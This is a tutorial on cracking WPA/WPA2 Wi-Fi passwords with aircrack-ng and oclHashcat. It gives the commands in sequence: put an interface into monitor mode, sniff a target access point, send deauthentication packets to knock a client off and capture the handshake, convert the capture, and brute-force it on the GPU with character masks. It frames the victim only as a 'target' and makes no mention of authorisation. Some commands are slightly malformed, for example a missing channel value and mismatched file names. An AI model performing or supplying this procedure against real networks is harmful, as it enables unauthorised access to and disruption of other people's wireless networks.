Use GPU to Speed Up WPA/WPA2 Password Cracking

There are many ways to crack a WPA/WPA2 password. We all know that a GPU (Graphic Processing Unit) is way faster than a CPU in terms of computation. So, we’ll use the power of GPU to speed up WPA/WPA2 cracking.The tools used will be (available for both windows and Linux.)

1. Aircrack-ng
2. Oclhashcat

This guide assumes the following things:

• wlan0                             is a WiFi interface
• mon0                             is the interface in monitor mode
• <channel>                     refers to the channel the target WI-Fi is operating on
• 00:2d:37:4b:e4:d5      is the MAC address of target AP (access point) (not real)
• cc:cc:4e:5b:d7:3d         is MAC of client associated with the target AP (not real)
• # (hash symbol)           is used to mark start of a command

Steps:

Open up a terminal 

Start by putting Wi-Fi interface in monitor mode

#airmon-ng start wlan0

This puts Wi-Fi in monitor mode and creates a new interface mon0 to sniff traffic.

Then, start sniffing air for all AP’s in the area.

#airodump-ng mon0

This will give you information about all AP’s in your vicinity. Select one with highest strength and focus on that one.

Press Ctrl+C to stop above command and type:

#airodump-ng –c –bssid 00:2d:37:4b:e4:d5 –w mon0

This command only sniffs for one specific AP:
-c tells which channel to sniff
-bssid is the MAC of AP to target
-w tell to write a file to capture handshake (for later use in recovering password)
mon0 is the monitor interface

Notice the MAC address of clients shown in the terminal; we’ll need it for the next step. 

Now, open a second terminal and type:

#aireplay-ng -0 5 –a 00:2d:37:4b:e4:d5 –c cc:cc:4e:5b:d7:3d mon0

This command says to de-authenticate a client from its AP
-0 tell how many time to send deauth signal (in this case 5 times)
-a tell the MAC of AP
-c tell the MAC of client connect to AP (Note: you can do a broadcast deauth, but it doesn’t work all the time. Target a specific client instead.)

mon0 is our interface. Once you see that airodump-ng shows Handshake captured in upper-right corner, stop the process (otherwise, it keeps deauthing the clients).

Once handshake file is captured and written (in format file.cap), clean the file using the following command:

#wpaclean clean_file.cap captured.cap

Here, clean_file.cap is output file. And, captured.cap is the input file (the file you captured). 

Now, prepare the file for hashcat by:

#aircrack-ng clean_file.cap -J for_cat

Here, clean_file.cap is from previous step. And, for_cat is for hashcat use (it will automatically add .hccap extension) 

Now, begin the cracking process by:

#oclhashcat –m 2500 –a 3 –session=my_session /for_cat.hccap /mymask.hcmask

Here, –m 2500 tell to crack WPA/WPA2
-a 3 tells to use brute-force or mask based brute force (more on it later)
-session=my_session tell to save the session (in case you plan to resume it later, it takes a very long time.)
/for_cat.hccap is path to your captured and cleaned prepared hashcat file
/mymask.hccap is path to the mask file

Once it’s done, the saved password will be stored in a .pot file (located in /usr/share/oclhashcat/ for kali) 

NOTES ON HASHCAT MASKSThe mask can take following format:

• ?u for upper case letters (ABC…)
• ?l for lower case letters (abc…)
• ?d for numbers
• ?s for symbols (ASCII only I think)
• ?a use all of the above characters

Thus to create a mask type in a black file:

• ?d?d?d?d?d?d?d?d for a 8 digit password

That’s it for this tutorial.